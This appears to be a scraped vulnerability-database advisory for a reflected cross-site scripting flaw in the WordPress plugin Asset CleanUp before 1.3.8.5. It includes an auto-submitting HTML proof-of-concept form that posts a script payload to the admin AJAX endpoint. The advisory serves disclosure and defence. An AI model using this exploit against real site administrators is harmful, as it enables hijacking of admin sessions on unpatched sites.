Lucene search

K
wpexploitJrXnmWPEX-ID:31FDABB0-BC74-4D25-B0CD-C872AAE6CB2F
HistoryJan 03, 2022 - 12:00 a.m.

Asset CleanUp < 1.3.8.5 - Reflected Cross-Site Scripting via AJAX Action

2022-01-0300:00:00
JrXnm
90
asset cleanup
cross-site scripting
ajax
security exploit

EPSS

0.001

Percentile

41.8%

The plugin does not sanitise and escape POSted parameters sent to the wpassetcleanup_fetch_active_plugins_icons AJAX action (available to admin users), leading to a Reflected Cross-Site Scripting issue

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="wpassetcleanup_fetch_active_plugins_icons" />
      <input type="hidden" name="xxx" value="<script>alert(/XSS/)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

EPSS

0.001

Percentile

41.8%

Related for WPEX-ID:31FDABB0-BC74-4D25-B0CD-C872AAE6CB2F